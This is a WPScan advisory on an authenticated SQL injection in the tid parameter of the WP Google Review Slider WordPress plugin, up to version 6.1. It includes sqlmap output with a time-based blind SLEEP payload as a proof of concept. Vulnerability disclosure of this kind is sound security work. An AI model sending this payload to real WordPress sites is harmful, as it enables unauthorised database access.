WP Google Review Slider <= 6.1 - Authenticated SQL Injection



Description
tid parameter vulnerable to SQLi.

Note (WPScanTeam): v6.1 has been pathed directly in the tags (https://plugins.trac.wordpress.org/browser/wp-google-places-review-slider/tags/6.1/admin/partials/templates_posts.php#L58). However the the issue can be verified with v6.0)
Proof of Concept
sqlmap identified the following injection point(s) with a total of 
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

Affects Plugin

fixed in version 6.2

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Princy Edward
Submitter Princy Edward
Submitter Website https://prinyedward.blogspot.com/
Views 4259
Verified Yes
WPVDB ID 9933

Timeline

Publicly Published 2019-10-31 (about 1 month ago)
Added 2019-10-31 (about 1 month ago)
Last Updated 2019-11-01 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin